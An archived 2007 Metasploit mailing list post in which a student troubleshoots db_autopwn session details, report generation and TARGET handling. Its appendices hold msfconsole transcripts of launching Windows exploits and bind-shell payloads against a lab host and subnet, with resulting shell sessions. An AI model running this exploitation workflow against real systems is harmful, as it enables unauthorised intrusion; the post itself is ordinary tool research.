Home page logo
/

metasploit logo Metasploit mailing list archives

Autopwn question [+generating Reports]
From: lex001 at gmx.de (Dennis Günnewig)
Date: Wed, 07 Feb 2007 23:12:42 +0100

Hi skape,

i played around with db_autopwn till today and was faced with a quite
strange behaviour:

The way you described works quite fine.
short:
======
use <exploit>
set <variable>
exploit -z
sessions -l -v

long:
======
appendix [1]


But if i do it the following way, the via-information is missing.

short:
=======
load db_mysql
db_connect user:password at localhost/msf1
db_autopwn -e -p
sessions -l -v

long:
=====
appendix [2]

i got only

|   Id  Description    Tunnel                                     Via
|   --  -----------    ------                                     ---
|   1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
|   2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308

Is this a built-in barrier against script kiddies or actually a not wanted behaviour?

I searched for helping files with strace ("strace -p <pid> (-e trace=file) -o ./strace_file.out /metasploit/msfconsole" 
+ "msf>
sessions -l -v") and lsof (lsof | grep /metas), but didn't find nothing suitable.

While searching API-documentation for suitable variables, I found set_via(), but without any working ruby-ide and 
running out of
time for my semester thesis I decided to ask the mailing list.

===

Furthermore are there any interfaces to take the output (scanned host(s), the scanned ports, the exploits which were 
able to
create sessions, the time the systems were scanned etc) to generate a xml-report?

And what do you think, how much time it would take for a programmer who is familiar with ruby and the msf to get such 
an extension
of the msf working?

===

Another strange behaviour I found, when starting db_autopwn -e -p: Setting TARGET to 3 seems not to have any effect on 
exploits
excuted by db_autopwn. Is this a problem between my ears ;), a wanted feature or to be leaded back to the beta status 
of the msf?

Maybe it would be better to allow TARGET to be a normal string or an integer as Windows XP SP1 Eng can be a "2" in the 
context of
one exploit (see [3]) and a "3" in another (see [4])

Best regards,
dennis


Appendix:

(1)===============================================
==================================================
| msf> use windows/tftp/tftpd32_long_filename
| msf exploit(tftpd32_long_filename)> set
|
| Global
| ======
|
|   Name     Value
|   ----     -----
|   PAYLOAD  windows/shell/bind_tcp
|   RHOST    192.168.111.12
|   RPORT    69
|
| Module: windows/tftp/tftpd32_long_filename
| ==========================================
|
|   Name      Value
|   ----      -----
|   EXITFUNC  process
|   RPORT     69
|   TARGET    3
|   WfsDelay  0
|
| msf exploit(tftpd32_long_filename)> exploit -z
| [...]
| msf exploit(tftpd32_long_filename)> sessions -l -v
|       or
| msf > sessions -l -v
|
| Active sessions
| ===============
|
|   Id  Description    Tunnel                                     Via
|   --  -----------    ------                                     ---
|   1   Command shell  192.168.111.1:1502 -> 192.168.111.12:4444  windows/tftp/tftpd32_long_filename




(2)===============================================
==================================================
| msf > load db_mysql
| [*] Successfully loaded plugin: db_mysql
| msf > db_connect user:password at localhost/msf1
| msf > db_hosts
| [*] Host: 192.168.111.12
| msf > db_services
| [*] Service: host=192.168.111.12 port=22 proto=tcp state=up name=ssh
| [*] Service: host=192.168.111.12 port=135 proto=tcp state=up name=msrpc
| [*] Service: host=192.168.111.12 port=139 proto=tcp state=up name=netbios-ssn
| [*] Service: host=192.168.111.12 port=445 proto=tcp state=up name=microsoft-ds
| [*] Service: host=192.168.111.12 port=1025 proto=tcp state=up name=msrpc
| [*] Service: host=192.168.111.12 port=3389 proto=tcp state=up name=microsoft-rdp
| [*] Service: host=192.168.111.12 port=5000 proto=tcp state=up name=upnp
| [*] Service: host=192.168.111.12 port=5800 proto=tcp state=up name=vnc-http
| [*] Service: host=192.168.111.12 port=5900 proto=tcp state=up name=vnc
| [*] Service: host=192.168.111.12 port=123 proto=udp state=up name=ntp
| [*] Service: host=192.168.111.12 port=135 proto=udp state=up name=msrpc
| msf > db_add_
| db_add_host  db_add_port
| msf > db_add_port
| [*] Usage: db_add_port [host] [port] [proto]
| msf > db_add_port 192.168.111.12 69 udp
| [*] Service: host=192.168.111.12 port=69 proto=udp state=up
|
| msf > setg TARGET 3
| TARGET => 3
| msf > setg
|
| Global
| ======
|
|   Name     Value
|   ----     -----
|   PAYLOAD  windows/shell/bind_tcp
|   RHOST    192.168.111.12
|   RHOSTS   192.168.111.0/24
|   RPORT    69
|   TARGET   3
| msf > db_autopwn -e -p
| [*] Launching exploit/windows/tftp/tftpd32_long_filename (4/76) against 192.168.111.12:69...
| [*]  >> Exception during launch from exploit/windows/tftp/tftpd32_long_filename: A target has not been selected.
| [*] Launching exploit/windows/smb/ms06_066_nwwks (6/76) against 192.168.111.12:445...
| [*] Started bind handler
| [*] Connecting to the SMB service...
| [*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0 at ncacn_np:192.168.111.12[\nwwks] ...
| [*] Launching exploit/windows/tftp/threectftpsvc_long_mode (15/76) against 192.168.111.12:69...
| [*] Started bind handler
| [*] Trying target 3CTftpSvc 2.0.1...
| [*] Launching exploit/windows/ssl/ms04_011_pct (17/76) against 192.168.111.12:69...
| [*] Started bind handler
|
| [...]
|
| msf > sessions -l -v
|
| Active sessions
| ===============
|
|   Id  Description    Tunnel                                     Via
|   --  -----------    ------                                     ---
|   1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
|   2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308



(3)===============================================
==================================================
msf exploit(freesshd_key_exchange) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 Pro SP4 English
   1   Windows XP Pro SP0 English
   2   Windows XP Pro SP1 English




(4)===============================================
==================================================
msf exploit(tftpd32_long_filename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows NT 4.0 SP6a English
   1   Windows 2000 Pro SP4 English
   2   Windows XP Pro SP0 English
   3   Windows XP Pro SP1 English



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault